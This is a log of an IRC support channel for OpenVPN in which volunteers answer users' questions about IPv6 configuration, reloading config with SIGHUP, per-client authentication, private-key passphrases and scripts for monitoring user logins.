08:56 -!- Steven_ [~deepstar@pegasus.singularity.be] has quit [Quit: leaving]
09:29 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
09:45 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 246 seconds]
09:49 -!- dazo is now known as dazo_afk
09:52 <@ecrist> !windows
09:52 <@vpnHelper> "windows" is (#1) computers are like air conditioners, they work well until you open windows. or (#2) http://secure-computing.net/files/windows.jpg for funny or (#3) http://secure-computing.net/files/windows_2.jpg for more funny
09:58 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn
09:58 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
10:11 -!- raidz_away is now known as raidz
10:19 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds]
10:31 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 246 seconds]
10:32 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds]
10:40 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has quit [Ping timeout: 255 seconds]
10:41 -!- MeanderingCode_ [~Meanderin@server-176.53.69.120.as42926.net] has joined #openvpn
10:41 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 245 seconds]
10:46 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
10:46 -!- brute11k [~brute11k@89.249.230.106] has joined #openvpn
10:46 * ecrist lols at IRC drama
10:46 -!- MeanderingCode_ [~Meanderin@server-176.53.69.120.as42926.net] has quit [Ping timeout: 240 seconds]
10:49 -!- Valcorb [~Valcorb@199.229.249.189] has quit []
10:52 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has joined #openvpn
10:53 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn
10:53 < soapee01> anybody seen krzee lately?
10:56 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has joined #openvpn
10:57 < ngharo> maybe
10:57 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn
10:59 <@ecrist> yes, what do you need soapee01
11:00 < soapee01> ecrist pm ok?
11:00 <@ecrist> no
11:00 <@ecrist> !topsecret
11:00 <@vpnHelper> "topsecret" is if your setup is so top secret that you cant post your configs or logs, please leave now and go find support you trust.
11:00 < soapee01> it's not setup related.
11:01 < soapee01> I'm not looking for help. openvpn works fine for me!
11:01 -!- bisko [~bisko@77.70.26.115] has quit [Ping timeout: 240 seconds]
11:03 <@ecrist> !seen krzee
11:03 <@vpnHelper> krzee was last seen in #openvpn 12 hours and 28 seconds ago: booya finally got a cmd
11:03 <@ecrist> :)
11:03 < soapee01> t/y ecrist. I'll linker here...
11:04 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
11:04 < soapee01> linger even...
11:06 < soapee01> oh, thank you guys for openvpn connect on iphone. that solves major headaches for everybody! Now I gotta borrow one to test...
11:09 <@ecrist> keep in mind, neither iphone nor android client can do bridged VPN
11:11 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 248 seconds]
11:15 < soapee01> bridged in what way? as in a tap wan setup with tun to mobiles? or bridging the wifi sharing on the phone?
11:20 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn
11:20 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host]
11:20 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
11:25 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Remote host closed the connection]
11:25 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has joined #openvpn
11:28 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn
11:29 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 276 seconds]
11:32 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
11:45 < BtbN> Is it possible to make OpenVPN request the IPv6 subnet it serves via DHCPv6, and then announce that it routes this subnet via radv-protocol?
11:49 < rob0> I doubt such functionality has yet been implemented.
11:50 < rob0> but maybe you can script something to be similar.
11:54 -!- AsadH is now known as zz_AsadH
11:54 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
12:03 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn
12:09 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 244 seconds]
12:27 < BtbN> rob0: I'd have to modify the openvpn.conf each time the advertisement changes, or is there some kind of "include", so i can just write the address to a file, and make openvpn notice any changes?
12:30 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
12:40 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
12:43 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Ping timeout: 246 seconds]
12:58 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn
13:00 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 240 seconds]
13:03 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn
13:13 < BtbN> So i really have to modify my entire config file? Can't find anything include-like oO
13:14 <+pekster> He said script, not change config
13:14 <+pekster> ie: --up or --route-up
13:15 <+pekster> Further reading in the manpage: the section titled 'SCRIPTING AND ENVIRONMENTAL VARIABLES'
13:15 < BtbN> pekster: i have a script run by the dhcpv6 which gets told the prefix
13:15 < BtbN> and i have to somehow get this into the openvpn config
13:16 <+pekster> the ipv6 addressing comes from outside openvpn then? on the raw link, or inside the tunnel?
13:16 < BtbN> I request a prefix delegation from my router via DHCPv6
13:16 < BtbN> and want OpenVPN to use that prefix
13:17 < BtbN> i already have a script which writes the necessary openvpn config line into a file, i now just need to include it
13:17 <+pekster> --config
13:18 < BtbN> i can just write config into a configuration file, and it will load the second file?
13:18 <+pekster> Yup
13:18 <+pekster> You can even HUP a running process to re-read the config
13:19 < BtbN> oh, that's great, so i don't have to restart it
13:19 <+pekster> Well, it's more or less a "restart" as far as clients are concerned, but the PID itself stays running
13:28 < BtbN> hm, killal -SIGHUP openvpn just kills it oO
13:28 < BtbN> +l
13:29 <+pekster> Perhaps you're downgrading runtime privs without the correct --persist-* options to support a HUP?
13:29 < BtbN> ah, it fails as OpenVPN tries to re-read the keys, which it no longer has permissions to
13:29 <+pekster> Check logs. A HUP is not the same as INT/TERM
13:29 < BtbN> yeah, exactly that
13:29 <+pekster> Yea
13:30 < BtbN> hm, persist-key and persist-tun is set
13:30 <+pekster> You probably can't use persist-tun since you need to change networking if the network range you're using changes
13:30 < rob0> I think there is a SIGNALS section in the man page.
13:30 <+pekster> ie: you can't downgrade privs and also expect ifconfig to have root access to change networking/routes
13:31 < rob0> SIGHUP Cause OpenVPN to close all TUN/TAP and network connections, restart, re-read the configuration file (if any), and reopen TUN/TAP and network connections.
13:31 <+pekster> BtbN: The --user manpage description does a good job explaining what you can and cannot expect to work if you need to HUP/USR1 the process with reduced privs
13:33 < BtbN> I have not set any user/group. Seems like it's my distros init-script which does it
13:33 < rob0> (You can expect it, but you will be disappointed. :) )
13:34 <+pekster> manpages often change expectations :P
13:35 <+pekster> BtbN: Some init scripts grep for 'user' and 'group' and set them if undefined. Set them to root or modify your initscript to avoid this behaviour
13:36 <+pekster> Better yet, patch it to be a config option and send your distro a patch ;)
13:38 < BtbN> Theoretically it's working now :D
13:39 < BtbN> But i get a /62
13:43 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 252 seconds]
13:48 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
13:49 -!- mode/#openvpn [+o krzee] by ChanServ
13:51 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 240 seconds]
13:54 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn
13:58 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn
14:01 -!- zz_AsadH is now known as AsadH
14:08 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has joined #openvpn
14:14 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
14:24 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
14:27 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn
14:37 <@krzee> soapee01, hows it going
14:43 -!- mdw- [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has joined #openvpn
14:50 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 272 seconds]
14:53 -!- pa [~pa@unaffiliated/pa] has joined #openvpn
15:23 < BtbN> How do i make OpenVPN listen on v4 and v6/dual-v6? It only listens on 0.0.0.0 currently
15:24 <@krzee> ild guess --local6 or something, have a look at the 2.3 manual
15:24 <@krzee> !man
15:24 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend!
15:25 < BtbN> I already read the whole man page, couldn't find information about this
15:26 <@krzee> 1sec
15:26 < BtbN> I only found on google that it is possible with 2.3.0, but not how
15:27 <@krzee> proto udp6
15:28 <@krzee> http://www.ipsidixit.net/2010/06/21/openvpn-over-ipv6/
15:28 <@vpnHelper> Title: OpenVPN over IPv6 « ipsidixit.net (at www.ipsidixit.net)
15:28 <@krzee> i cant speak for that link, but it looks like it does what you said more or less
15:29 < BtbN> it's listening on IPv6 only with that, so lets hope it also accepts ipv4
15:36 < BtbN> yes it does :)
15:39 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
15:44 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt]
15:47 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit []
15:57 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has quit [Ping timeout: 244 seconds]
16:13 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
16:21 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn
16:25 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Read error: Operation timed out]
16:30 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn
16:36 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has left #openvpn ["Leaving"]
16:38 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat]
16:57 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
16:57 -!- mode/#openvpn [+v s7r] by ChanServ
16:58 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn
17:03 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
17:03 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
17:03 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
17:03 -!- mode/#openvpn [+o krzee] by ChanServ
17:06 -!- AsadH is now known as zz_AsadH
17:25 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 248 seconds]
17:25 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has quit [Ping timeout: 245 seconds]
17:26 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has joined #openvpn
17:28 -!- _polto_ [~polto@dslpre0565.worldcom.ch] has joined #openvpn
17:28 -!- _polto_ [~polto@dslpre0565.worldcom.ch] has quit [Changing host]
17:28 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn
17:28 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.]
17:31 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has quit [Quit: Rolybrau]
17:40 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Read error: Connection reset by peer]
17:59 -!- gardar [~gardar@gardar.net] has quit [Remote host closed the connection]
18:07 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has joined #openvpn
18:09 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has quit [Client Quit]
18:29 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has quit [Quit: ZNC - http://znc.in]
18:30 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 276 seconds]
18:30 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has joined #openvpn
18:31 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
18:37 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
18:37 -!- mode/#openvpn [+o krzee] by ChanServ
18:43 -!- ThersiT [~AndChat50@unaffiliated/thersit] has joined #openvpn
18:46 < ThersiT> Is there any way, using the openvpn-auth-pam.so plugin, to ask one client for a user/pass but not others?
18:50 -!- ThersiT is now known as ThersiT1
18:51 -!- ThersiT [~ThersiT@unaffiliated/thersit] has joined #openvpn
18:52 -!- ThersiT1 [~AndChat50@unaffiliated/thersit] has left #openvpn ["Leaving"]
19:00 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn
19:03 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Quit: Computer has gone to sleep.]
19:04 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn
19:05 -!- xbskid [~asdf@cpe-67-244-148-156.rochester.res.rr.com] has quit []
19:05 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Client Quit]
19:07 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn
19:07 <@krzee> ThersiT, not sure, you could try putting it in a ccd
19:08 < ThersiT> ccd?
19:09 <@krzee> !ccd
19:09 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects.
19:09 < ThersiT> Oh, that sounds pretty good. I'll give it a shot.
19:11 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 245 seconds]
19:11 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn
19:12 <@krzee> not everything works in ccd entries, but maybe it will
19:12 <@krzee> if --plugin does not work there, see if a script will
19:12 <@krzee> !script
19:12 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn
19:14 < ThersiT> What I'm trying to do is, I've got a laptop that the company I work for owns. I would like to set it up to connect to my personal VPN but sometimes I have to loan the laptop to a co-worker and I don't want them to have free access to my VPN.
19:14 < ThersiT> Do you think this plugin is the way to go or is there a simpler way?
19:20 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Quit: Wychodzi]
19:24 <@krzee> i dont use password auth
19:24 <+pekster> Why are you using PAM at all then? X509 with a password-protected private key would be plenty sufficient
19:24 <@krzee> !authpass
19:24 <@vpnHelper> "authpass" is (#1) please see --auth-user-pass-verify in the manual to learn how to force clients to use passwords in addition to certs or (#2) or to ONLY use passwords (no certs, highly NOT recommended) also use --client-cert-not-required or (#3) and if you want the login name to be used as the common-name for things like ccd entries, use --username-as-common-name
19:24 <@krzee> thats another way ^
19:24 <+pekster> Or keep the password and just log out before handing the laptop to someone else?
19:25 <@krzee> although yes, pekster's idea is perfect
19:25 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 244 seconds]
19:25 <@krzee> in fact even if you use pam, for your use you should encrypt the private key as well
19:25 <+pekster> No need to have a private key client-side if using PAM server-side without two-factor auth
19:25 <+pekster> The only key would be on the server (and I suppose the CA key)
19:26 <@krzee> sure, but you could just use pki, forget about pam altogether and encrypt the private key
19:26 <@krzee> thats what ild do
19:26 -!- corretico [~luis@190.211.93.38] has joined #openvpn
19:27 <@krzee> !certpw
19:27 <@krzee> !factoids search cert
19:27 <@vpnHelper> 'servercert', 'certs', 'nocert', 'certverify', 'certinfo', 'cert_chains', and 'certfight'
19:27 <@krzee> hmm
19:27 <@krzee> someone was changing vpnHelper on me =/
19:27 < ThersiT> Yeah, that sounds like a way better way to do it. Glad I asked. Thanks.
19:27 <@krzee> !factoids search pw
19:27 <@vpnHelper> "pwfile" is (#1) OpenVPN will only read passwords from a file if it has been built with the --enable-password-save configure option, or on Windows by defining ENABLE_PASSWORD_SAVE in config-win32.h or (#2) see --auth-user-pass in the manual (!man) for more info or (#3) if you're using this with the windows service, you will need --askpass
19:27 <@krzee> !factoids search pass
19:27 <@vpnHelper> 'winpass', '2.1-winpass-script', 'authpass', 'password-only', 'strip-passphrase', 'change-passphrase', 'enable-passwd-save', and 'password'
19:27 <@krzee> !change-passphrase
19:27 <@vpnHelper> "change-passphrase" is see http://openvpn.net/archive/openvpn-users/2005-03/msg00230.html for how to change (or add) a key's passphrase
19:27 <@krzee> there ya go ^
19:28 <@krzee> and i was wrong, nobody changed anything… im just not thinking well after a full day digging and moving hay at the ranch
19:28 <+pekster> I think the solution is a glass or 3 of beer
19:29 <@krzee> i was gunna go with my pipe
19:29 <@krzee> !learn certpw as [change-passphrase]
19:29 <@vpnHelper> Joo got it.
19:29 <@krzee> !certpw
19:29 <@vpnHelper> "certpw" is "change-passphrase" is see http://openvpn.net/archive/openvpn-users/2005-03/msg00230.html for how to change (or add) a key's passphrase
19:29 <@krzee> there we goes
19:33 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
19:35 < ThersiT> Cool, I'm gonna have to do some reading to wrap my head around all of that but it looks like just what I need.
19:41 <@krzee> oh if you use windows you dont need to mess with commandline
19:42 <@krzee> you could right click the openvpn tray icon and say "change password"
19:42 <@krzee> the password it refers to is for the private key
19:42 <@krzee> then anyone with access to the computer cant use the private key without that password
19:44 < ThersiT> haha. My machines are all linux but the work laptop is windows. I think I'd like to try it at the commandline first.
19:44 <@krzee> werd
19:44 <+pekster> The GUI password change feature is just a proxy to 'openssl rsa' anyway
19:44 < ThersiT> That sounds too much like cheating to me.
19:45 <+pekster> It even has cute registry keys to "prevent" you from changing to a too-short or empty password :P
19:45 <@krzee> no empty? then how do you remove the pass via gui?
19:46 <+pekster> Set the registry to allow it?
19:46 <@krzee> then again maybe you dont want people who cant use openssl from cli to be removing passwords
19:46 <+pekster> Yea, that ^^
19:47 <@krzee> sometimes i forget to stop thining like a unix guy
19:47 <@krzee> thinking*
19:47 <+pekster> I forget even when I'm on Windows (any box I'm on usually gets Cygwin/putty/gVim/notepad++ installed in about 2 minutes of my arrival)
19:47 -!- ThersiT1 [~AndChat50@99-88-241-15.lightspeed.austtx.sbcglobal.net] has joined #openvpn
19:48 <@krzee> oh i got that box joined to the domain over the vpn :D
19:48 -!- raidz is now known as raidz_away
19:48 <@krzee> \o/
19:48 <@krzee> (speaking of windows)
19:49 <@krzee> you were right (as you know), split-dns was perfect
19:49 <+pekster> Try this on for size; I once had to reset a domain user's pass 2 jobs ago who "forgot" and couldn't log in locally using the cached domain credentials (no domain access, remember.) I got her logged in using a local account, set up OpenVPN as a system service to start on boot, rebooted, and she was able to use the newly reset password
19:50 <+pekster> That was not a very fun 30 minutes...
19:50 * pekster files that under "ways you're not generally supposed to do things"
19:50 <@krzee> hahah
19:52 <@krzee> luckily a co-worker knew the local account credentials
19:53 <@krzee> i had visions of trying to help (in spanish) a guy hack windows local account
19:54 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 252 seconds]
19:59 -!- ThersiT1 [~AndChat50@99-88-241-15.lightspeed.austtx.sbcglobal.net] has quit [Quit: Bye]
20:45 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 276 seconds]
20:47 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn
21:05 -!- u0m3_ [~Radu@92.80.113.12] has joined #openvpn
21:07 -!- u0m3 [~Radu@92.80.72.203] has quit [Ping timeout: 245 seconds]
21:16 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
21:28 -!- ThersiT [~ThersiT@unaffiliated/thersit] has quit [Quit: Ex-Chat]
21:52 < soapee01> krzee!
21:53 < soapee01> dang bouncer.
22:04 < soapee01> :/ this supybot needs the later plugin.
22:55 -!- BtbN [~btbn@btbn.de] has quit [Quit: Bye] 22:55 -!- BtbN [~btbn@btbn.de] has joined #openvpn 23:19 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 23:19 -!- mode/#openvpn [+o krzee] by ChanServ 23:26 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Quit: Leaving] 23:33 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn 23:43 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn --- Day changed Fri Jan 25 2013 00:12 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 255 seconds] 00:15 -!- rkantos [~Name@4e.fi] has joined #openvpn 00:30 -!- brute11k [~brute11k@89.249.230.106] has quit [Ping timeout: 276 seconds] 00:35 -!- rkantos [~Name@4e.fi] has quit [Ping timeout: 245 seconds] 00:37 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 240 seconds] 00:42 -!- rkantos [robin@4e.fi] has joined #openvpn 00:51 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 255 seconds] 00:56 -!- lonmarlon [~lonmarlon@msmi.manship.com] has joined #openvpn 00:56 < lonmarlon> hello guys 00:57 < lonmarlon> i'd like to ask a question 00:57 <@krzee> !ask 00:57 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 00:57 < lonmarlon> cool 00:58 < lonmarlon> well anyways it's about how to monitor the login and disconnected time of the users in openvpn 00:58 < lonmarlon> i'm using a lenny server 00:58 <@krzee> via script 00:58 <@krzee> how you go about that is up to you, but heres a few ideas: 00:58 -!- rkantos [robin@4e.fi] has joined #openvpn 00:58 < lonmarlon> do you have sample script that i can learn? 
00:59 < lonmarlon> yes i know via script 00:59 <@krzee> a) you could have a client-connect / client-disconnect script that updates some sort of database 00:59 <@krzee> b) you could have a script via crontab that checks the management interface 01:00 <@krzee> c) you could have a cron script read the status file after sending a signal to openvpn to update it 01:00 < lonmarlon> what do you mean by management interface? 01:00 <@krzee> !management 01:00 <@vpnHelper> "management" is (#1) see http://openvpn.net/management for doc on management interface or (#2) read http://svn.openvpn.net/projects/openvpn/obsolete/BETA21-preauto/openvpn/management/management-notes.txt if you are a programmer making a GUI that will interact with OpenVPN 01:00 < lonmarlon> hehehe you're really cool 01:00 <@krzee> and im sure theres other ways to do it as well 01:01 <@krzee> thats just 3 lil ideas for ya, a push in the right direction 01:01 <@krzee> !factoids 01:01 < lonmarlon> do you know where can i get a sample script so i can study them? 01:01 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 01:02 <@krzee> nope 01:02 <@krzee> i just checked the bot to see if he had one 01:04 < lonmarlon> are you a sysad krzee? 01:05 <@krzee> sure 01:05 < lonmarlon> where you from? 01:07 <@krzee> !krzee 01:07 <@vpnHelper> "krzee" is (#1) krzee says happy 4/20 or (#2) http://www.ircpimps.org/pics/krzee/blunt.jpg 01:18 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.] 
01:30 -!- CrashTM [~CrashTM@69.162.93.219] has joined #openvpn 01:31 < CrashTM> hello people 01:35 < lonmarlon> nice 01:41 -!- lonmarlon [~lonmarlon@msmi.manship.com] has quit [] 01:42 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 01:42 -!- ade_b [~Ade@95.209.41.35.bredband.tre.se] has joined #openvpn 01:42 -!- ade_b [~Ade@95.209.41.35.bredband.tre.se] has quit [Changing host] 01:42 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 01:44 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 276 seconds] 01:49 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 246 seconds] 01:51 -!- bisko [~bisko@77.70.26.115] has joined #openvpn 01:57 -!- rkantos [robin@4e.fi] has joined #openvpn 01:57 -!- CrashTM [~CrashTM@69.162.93.219] has quit [Ping timeout: 264 seconds] 01:59 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 02:10 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 02:10 -!- chovy [~ettinger@108-194-42-92.lightspeed.mtryca.sbcglobal.net] has joined #openvpn 02:11 < chovy> is it possible to use openvpn on a server? 
02:18 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 245 seconds] 02:20 <+hazardous> yes 02:26 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 276 seconds] 02:26 -!- rkantos [robin@4e.fi] has joined #openvpn 02:26 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 244 seconds] 02:55 -!- rkantos [robin@4e.fi] has quit [Read error: Operation timed out] 02:58 -!- xe` [~xe@annex.yi.org] has joined #openvpn 03:06 -!- rkantos [robin@4e.fi] has joined #openvpn 03:10 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:35 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:51 -!- gardar [~gardar@gardar.net] has joined #openvpn 04:01 < EugeneKay> krzee is from the moon 04:02 < EugeneKay> Where they smoke the moonajuana 04:04 -!- djc [~djc@gentoo/developer/djc] has joined #openvpn 04:04 < djc> after installing openvpn-2.3 on 64-bit win7, I get an error that amounts to "Error while creating HKLM\Software\OpenVPN-GUI key" 04:04 < djc> anyone knows what's up with that 04:09 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Read error: Operation timed out] 04:09 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Quit: Computer has gone to sleep.] 04:24 < djc> also, you guys should create a "2.3" version in the bug tracker 04:24 < djc> also also, anyone knows what's up with client-to-client on iOS clients? 04:28 -!- dazo_afk is now known as dazo 04:34 < kisom> djc: There's an iOS client now? 
04:37 < djc> kisom: there is 04:37 < djc> apparently openvpn worked with apple to use their proprietary vpn API 04:38 < djc> there are some caveats, and client-to-client (which wasn't in the caveats) didn't work for me, but otherwise it's quite smooth (largely similar to the Android stuff) 04:38 < kisom> Nice, gotta check it out 04:38 < kisom> client-to-client is a server directive, fyi 04:39 < djc> I'm aware 04:39 < djc> but from the iOS client, I can't reach other clients 04:39 < kisom> I don't see why it would not work on iOS if there is a client 04:39 < djc> which works with Android clients 04:39 < kisom> OK, I'll have a look later 04:39 -!- jave_ [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Quit: ZNC - http://znc.in] 04:40 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 04:41 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 04:41 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Remote host closed the connection] 04:42 <@dazo> djc: regarding 252 -> that is a known bug in the 2.3.0-I0001 installer. Mattock has a fix. 04:42 <@dazo> "custom path" is broken 04:45 -!- mjixx_ [~markus@80.67.14.31] has quit [Ping timeout: 252 seconds] 04:45 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 04:45 -!- mjixx [~markus@80.67.14.31] has joined #openvpn 04:47 < djc> oh, was that in #openvpn-devel 04:47 < djc> ? 
04:47 < djc> thanks for relaying it, in any case :) 04:48 < djc> dazo: I was a bit confused by the separate openvpn-gui project, so I filed everything against openvpn, hope that's okay 04:48 -!- zu [~zu@ks387228.kimsufi.com] has quit [Ping timeout: 248 seconds] 04:49 -!- `nand` [~nand@static.102.126.46.78.clients.your-server.de] has quit [Ping timeout: 248 seconds] 04:50 -!- zu [~zu@ks387228.kimsufi.com] has joined #openvpn 04:51 -!- `nand` [~nand@static.102.126.46.78.clients.your-server.de] has joined #openvpn 04:51 <@dazo> djc: yeah, we'll figure it out :) 04:52 < djc> dazo: btw, the 3.0 roadmap looks kind of cool, though the rewrite from scratch sounds a bit scary 04:52 -!- master_of_master [~master_of@p57B53A40.dip.t-dialin.net] has quit [Ping timeout: 245 seconds] 04:53 <@dazo> djc: it's not a complete rewrite, though ... actually we're moving the current code base slowly towards that goal ... however, James has written something from scratch already - for Android and iOS, but that hasn't been open sourced yet (they have promised that will happen, though) 04:53 <@dazo> but that re-write is currently only the client side code 04:54 < djc> a use case I've thought about in the past would be a small liberally-licensed network protocol library that would let me connect with a static vpn config, so I could embed a small copy in an android or ios app so that I could basically run a webview app over vpn 04:54 < djc> of course, my use case is significantly reduced now that there are nice ios and android implementations :) 04:54 -!- master_of_master [~master_of@p57B540A0.dip.t-dialin.net] has joined #openvpn 04:56 < djc> also, I do hope netlink sockets support is at some not-too-low level of priority :) 04:57 < djc> dazo: anyway, is there any rough eta for a 2.3.1 that includes mattock's 